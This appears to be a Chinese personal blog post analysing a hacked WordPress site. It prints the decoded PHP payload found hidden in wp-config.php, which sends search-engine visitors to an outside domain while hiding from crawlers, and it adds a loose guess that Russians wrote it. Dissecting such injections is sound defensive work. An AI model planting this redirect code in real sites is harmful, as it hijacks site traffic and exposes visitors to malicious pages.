昨天在微博看到一个不错的个人博客站点出现问题,google搜索结果被劫持,直接跳转到hitpitlit.osa.pl。当时柴子就联想到最近的美国ISP劫持事件(链接),结果走入歪路,还是天毅和A.shun 判断正确,是被人植入了代码。
刚才天毅拿到cp,直接查看代码,最后终于在wp-config.php中发现问题(真猥琐,该文件不会随着程序更新而更新)
eval(base64_decode("DQoNCmVycm9yX3JlcG9ydGluZygwKTsNC…………QoJfQ0KCX0=")); (不完全引用,太长)
base64解码后:
- ···
- error_reporting(0);
- $qazplm=headers_sent();
- if (!$qazplm){
- $referer=$_SERVER['HTTP_REFERER'];
- $uag=$_SERVER['HTTP_USER_AGENT'];
- if ($uag and !stristr($uag,"StackRambler") and !stristr($uag,"aport") and !stristr($uag,"WebAlta") and !stristr($uag,"aport") and !stristr($uag,"compatible; Yandex") and !stristr($uag,"dyatel")) {
- if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"meta.ua") or stristr($referer,"bigmir.net") or stristr($referer,"tut.by") or stristr($referer,"ukr.net") or stristr($referer,"poisk.ru") or stristr($referer,"liveinternet.ru") or stristr($referer,"gde.ru") or stristr($referer,"quintura.ru") or stristr($referer,"qip.ru") or stristr($referer,"mail.ru") or stristr($referer,"metabot.ru")) {
- if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
- header("Location: http://hitpitlit.osa.pl/threat/");
- exit();
- }
- }
- }
- }
天毅怀疑是前苏联尤其是俄罗斯人的代码,哦~ 传说中地球上最强悍的地区
本文由 柴子 创作,采用 知识共享署名4.0 国际许可协议进行许可
本站文章除注明转载/出处外,均为本站原创或翻译,转载前请务必署名